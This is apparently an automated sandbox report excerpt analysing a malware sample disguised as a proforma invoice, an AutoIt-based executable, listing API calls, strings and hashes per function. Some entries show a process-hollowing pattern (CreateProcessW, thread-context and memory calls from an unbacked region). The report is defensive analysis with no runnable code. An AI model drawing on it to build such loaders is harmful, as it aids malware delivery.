                                    • TranslateMessage.USER32(?), ref: 0030DB7B
                                    • DispatchMessageW.USER32(?), ref: 0030DB89
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030DB9F
                                    • Sleep.KERNEL32(0000000A), ref: 0030DBB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                    • String ID:
                                    • API String ID: 2189390790-0
                                    • Opcode ID: 9ce13e4a3290e72b1c04349dc023e967e4af069bf34d29528d96f0969665803b
                                    • Instruction ID: 32b0e07155c847b09a072b0bfb97ab4d60ae4d73c7b9fe70f465922bcf47a354
                                    • Opcode Fuzzy Hash: 9ce13e4a3290e72b1c04349dc023e967e4af069bf34d29528d96f0969665803b
                                    • Instruction Fuzzy Hash: F242E230609341EFD72BCF64C864FAAB7E8BF46300F15851AE8558B2E1D771E848CB92

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00302D07
                                    • RegisterClassExW.USER32(00000030), ref: 00302D31
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00302D42
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00302D5F
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00302D6F
                                    • LoadIconW.USER32(000000A9), ref: 00302D85
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00302D94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: cba9b11984740de75a69db612293044041ff85f5cbaf260370077a89eb1eeb31
                                    • Instruction ID: 9a620dbe737b9191a74d6c4ba6456c444b15f5f05ff327341e694a22f02fe356
                                    • Opcode Fuzzy Hash: cba9b11984740de75a69db612293044041ff85f5cbaf260370077a89eb1eeb31
                                    • Instruction Fuzzy Hash: 3021C3B5922218AFEB02DFA4EC59BDDBBB8FB08700F00511BF511A62A0D7B24544CF91

                                    Control-flow Graph
                                    APIs
                                      • Part of subcall function 0034039A: CreateFileW.KERNELBASE(00000000,00000000,?,00340704,?,?,00000000,?,00340704,00000000,0000000C), ref: 003403B7
                                    • GetLastError.KERNEL32 ref: 0034076F
                                    • __dosmaperr.LIBCMT ref: 00340776
                                    • GetFileType.KERNELBASE(00000000), ref: 00340782
                                    • GetLastError.KERNEL32 ref: 0034078C
                                    • __dosmaperr.LIBCMT ref: 00340795
                                    • CloseHandle.KERNEL32(00000000), ref: 003407B5
                                    • CloseHandle.KERNEL32(?), ref: 003408FF
                                    • GetLastError.KERNEL32 ref: 00340931
                                    • __dosmaperr.LIBCMT ref: 00340938
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: 49794579435ed7e79b91136c4f6844cbcd8567d678cce5b3ae3e899668fb7734
                                    • Instruction ID: 5c73986c389387c2d7e7752e2f441eada2ecf6ea87afcabd9fd2db7fb2b07517
                                    • Opcode Fuzzy Hash: 49794579435ed7e79b91136c4f6844cbcd8567d678cce5b3ae3e899668fb7734
                                    • Instruction Fuzzy Hash: 2EA13636A001148FDF1EAF68D891BAE7BF4EB06320F25015AF911AF291D735AC12CB91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00303A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003D1418,?,00302E7F,?,?,?,00000000), ref: 00303A78
                                      • Part of subcall function 00303357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00303379
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0030356A
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0034318D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003431CE
                                    • RegCloseKey.ADVAPI32(?), ref: 00343210
                                    • _wcslen.LIBCMT ref: 00343277
                                    • _wcslen.LIBCMT ref: 00343286
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 98802146-2727554177
                                    • Opcode ID: 35ebe9a080f21abacafb5633200ebf6b38990a2a4125e4a79658d43782127013
                                    • Instruction ID: d0df0728064028b63a85b68b57d28fe9f2a384ffbffd028bcbb3dc487e80f21b
                                    • Opcode Fuzzy Hash: 35ebe9a080f21abacafb5633200ebf6b38990a2a4125e4a79658d43782127013
                                    • Instruction Fuzzy Hash: 59719E755063019FC706EF65EC929ABBBECFFA5340F40092EF5458B2A1DB709A48CB61

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00302B8E
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00302B9D
                                    • LoadIconW.USER32(00000063), ref: 00302BB3
                                    • LoadIconW.USER32(000000A4), ref: 00302BC5
                                    • LoadIconW.USER32(000000A2), ref: 00302BD7
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00302BEF
                                    • RegisterClassExW.USER32(?), ref: 00302C40
                                      • Part of subcall function 00302CD4: GetSysColorBrush.USER32(0000000F), ref: 00302D07
                                      • Part of subcall function 00302CD4: RegisterClassExW.USER32(00000030), ref: 00302D31
                                      • Part of subcall function 00302CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00302D42
                                      • Part of subcall function 00302CD4: InitCommonControlsEx.COMCTL32(?), ref: 00302D5F
                                      • Part of subcall function 00302CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00302D6F
                                      • Part of subcall function 00302CD4: LoadIconW.USER32(000000A9), ref: 00302D85
                                      • Part of subcall function 00302CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00302D94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 423443420-4155596026
                                    • Opcode ID: 1c4cebb51eafbf5d8171e6591eb9b023f6369b3497ebc79ba696f513e323f407
                                    • Instruction ID: 2b78cc67b0da61fdcd26854da251c318b96c98f542c8104e62e27d69c6b6bc57
                                    • Opcode Fuzzy Hash: 1c4cebb51eafbf5d8171e6591eb9b023f6369b3497ebc79ba696f513e323f407
                                    • Instruction Fuzzy Hash: A2211A78E12314BFDB129FE5FC55A997FB8FB48B50F40011BE504A66A0D7B10540CF90
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0030BB4E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: p#=$p#=$p#=$p#=$p%=$p%=$x#=$x#=
                                    • API String ID: 1385522511-630006126
                                    • Opcode ID: 38f3aa248205e7ff19a3a7198036c2803906946896328174b9aba395ddd725a0
                                    • Instruction ID: 36df2c4c1d25874a69269ef8a52ca9452c2b1a1a99057ce79712d9796d944277
                                    • Opcode Fuzzy Hash: 38f3aa248205e7ff19a3a7198036c2803906946896328174b9aba395ddd725a0
                                    • Instruction Fuzzy Hash: A232E039A01209DFCB1ACF54C8A4EBEB7B9EF44300F168059ED15AB2A1C775ED45CB91

                                    Control-flow Graph (rendered graph not reproduced; blocks in this function call DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, KillTimer, CreatePopupMenu, MoveWindow and SetFocus)
                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0030316A,?,?), ref: 003031D8
                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0030316A,?,?), ref: 00303204
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00303227
                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0030316A,?,?), ref: 00303232
                                    • CreatePopupMenu.USER32 ref: 00303246
                                    • PostQuitMessage.USER32(00000000), ref: 00303267
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                    • String ID: TaskbarCreated
                                    • API String ID: 129472671-2362178303
                                    • Opcode ID: ce91705495734c3f28411c9afe42e68ae0f942b515ab74ab75c6f5593aa1ce3f
                                    • Instruction ID: 51198d54bafafe20587e4612478c01d5c8fccbee6ab5cc29a7ce3839cd081e85
                                    • Opcode Fuzzy Hash: ce91705495734c3f28411c9afe42e68ae0f942b515ab74ab75c6f5593aa1ce3f
                                    • Instruction Fuzzy Hash: A3413B39256200BBDB1B6BBCEC3DB7A375DEB0A340F041517F5129A6E1C771DA8097A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D%=$D%=$D%=$D%=$D%=D%=$Variable must be of type 'Object'.
                                    • API String ID: 0-966852419
                                    • Opcode ID: 25257e28e047729d9e82260612a34bb02370f3150c15c586a901682ca9d6b312
                                    • Instruction ID: ced09a07da9a341004fea09effa64c2dc981aec15591da3e8bf85c65b31dea6b
                                    • Opcode Fuzzy Hash: 25257e28e047729d9e82260612a34bb02370f3150c15c586a901682ca9d6b312
                                    • Instruction Fuzzy Hash: 96C2BE75B01214CFCB26CF58D8A0AADB7B5FF09300F258969E946AB3A1D375ED41CB90

                                    Control-flow Graph (rendered graph not reproduced; blocks in this function call CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree)
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03DBBB31
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03DBBD57
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0
                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                    • Instruction ID: 94f5f89eae2661a5111bc44c4b31047189a440bd67c37d61565bb84d1f94d6bd
                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                    • Instruction Fuzzy Hash: A8A1FA74E00209EBDB14CFA4C994BEEB7B5FF48704F24859AE506BB280DB759A41CF64

                                    Control-flow Graph (rendered graph not reproduced; single block 302c63-302cd3 calling CreateWindowExW twice and ShowWindow twice)
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00302C91
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00302CB2
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00301CAD,?), ref: 00302CC6
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00301CAD,?), ref: 00302CCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: a7120b1572f6be29b0da48ed5530d180ba215369d55ed335f7c408c5e6950f67
                                    • Instruction ID: 225f7c9633c2023b1225fe9ba97df71f327b23012d3aa8662c113030c0bf98c9
                                    • Opcode Fuzzy Hash: a7120b1572f6be29b0da48ed5530d180ba215369d55ed335f7c408c5e6950f67
                                    • Instruction Fuzzy Hash: B8F0D4796512907BEB331B27BC08EB72FBDD7CAF60F00105BF904A25A0C6B21850DAB0

                                    Control-flow Graph (rendered graph not reproduced; blocks in this function call CreateFileW, VirtualAlloc, ReadFile and ExitProcess)
                                    APIs
                                      • Part of subcall function 03DBB710: Sleep.KERNELBASE(000001F4), ref: 03DBB721
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03DBB94D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: Q596P8EHVI
                                    • API String ID: 2694422964-750146690
                                    • Opcode ID: 8d764905f31dc5872677139215ccf54ee001ce812867f351bd1f135e84fb7f60
                                    • Instruction ID: 7acb14484e9e7f2b17adeafb40312ee66af9c7393170f65d39756e436d68f740
                                    • Opcode Fuzzy Hash: 8d764905f31dc5872677139215ccf54ee001ce812867f351bd1f135e84fb7f60
                                    • Instruction Fuzzy Hash: 8B518D74D04248EBEF10DBA4C855BEEBB79EF48700F00459AE609BB2C0D6B95B45CBA5

                                    Control-flow Graph (rendered graph not reproduced; blocks in this function call RegOpenKeyExW, RegQueryValueExW and RegCloseKey)
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00303B0F,SwapMouseButtons,00000004,?), ref: 00303B40
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00303B0F,SwapMouseButtons,00000004,?), ref: 00303B61
                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00303B0F,SwapMouseButtons,00000004,?), ref: 00303B83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 6ea0db19f57f6c26d533c823129111118889745d9c7d03d076f1d4bcdd3c34bf
                                    • Instruction ID: 71be5a203ac25038ed11627d6cfd61507ce7f54ef9d6a227f714538e50548621
                                    • Opcode Fuzzy Hash: 6ea0db19f57f6c26d533c823129111118889745d9c7d03d076f1d4bcdd3c34bf
                                    • Instruction Fuzzy Hash: 0B112AB5521208FFDB228FA5DC95AAFBBBCEF04748F11445AA805D7250D231DE449760

                                    Control-flow Graph (rendered graph not reproduced; blocks in this function call CreateProcessW, Wow64GetThreadContext, ReadProcessMemory and Wow64SetThreadContext)
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03DBAECB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DBAF61
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DBAF83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1717140100.0000000003DB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DB9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_3db9000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                    • Instruction ID: a42d24a3bbe7b7aad059ff3bbb21f0411592e06f23121d366c33a5c386a30798
                                    • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                    • Instruction Fuzzy Hash: 1162FA30A14258DBEB24CFA4C850BDEB376EF58700F1091A9E10DEB390E7759E85CB59

                                    Control-flow Graph (rendered graph not reproduced; blocks in this function call LoadStringW and Shell_NotifyIconW)
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003433A2
                                      • Part of subcall function 00306B57: _wcslen.LIBCMT ref: 00306B6A
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00303A04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_wcslen
                                    • String ID: Line:
                                    • API String ID: 2289894680-1585850449
                                    • Opcode ID: 82512e3e7ee529dbe3267846e177a5ec85ca5a40e75d94b9c7b1b8ebca1fde87
                                    • Instruction ID: 8a6263a5fdccb514fc666119560867d349efff03fe557d0cff49d2d6f9c42e0c
                                    • Opcode Fuzzy Hash: 82512e3e7ee529dbe3267846e177a5ec85ca5a40e75d94b9c7b1b8ebca1fde87
                                    • Instruction Fuzzy Hash: 6631A27151A300ABD727EB24EC66BEBB7DCAB40710F00492BF599971D1DB709A49C7C2
                                    APIs
                                    • GetOpenFileNameW.COMDLG32(?), ref: 00342C8C
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                      • Part of subcall function 00302DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00302DC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Name$Path$FileFullLongOpen
                                    • String ID: X$`e<
                                    • API String ID: 779396738-2653119291
                                    • Opcode ID: f53101c648e109f418340a2d9acbcceeeb92fd3ca507ddccbd2f653cf9a514d1
                                    • Instruction ID: 0735675debd9cad9388f9dee973c64f9ba0edaf1489a5ab82ba1842aae1f7e65
                                    • Opcode Fuzzy Hash: f53101c648e109f418340a2d9acbcceeeb92fd3ca507ddccbd2f653cf9a514d1
                                    • Instruction Fuzzy Hash: A321C670A002589BCB02DF94C859BDE7BFC9F49304F00405AE405FB281DBB49A89CF61
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00320668
                                      • Part of subcall function 003232A4: RaiseException.KERNEL32(?,?,?,0032068A,?,003D1444,?,?,?,?,?,?,0032068A,00301129,003C8738,00301129), ref: 00323304
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00320685
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    • Opcode ID: 8bca53887294143395f53f77bb7e4c425b7cfabd95242d5c0c61153d01175edc
                                    • Instruction ID: 45f4e198a85fbf4aa0a938f59f596b844e0c7dce456c02943ed249deac345b54
                                    • Opcode Fuzzy Hash: 8bca53887294143395f53f77bb7e4c425b7cfabd95242d5c0c61153d01175edc
                                    • Instruction Fuzzy Hash: 6CF0AF3490021DABCB0AB7A4F846DAE7B6C9E00310B604535B914DA996EF71DB698680
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003882F5
                                    • TerminateProcess.KERNEL32(00000000), ref: 003882FC
                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 003884DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
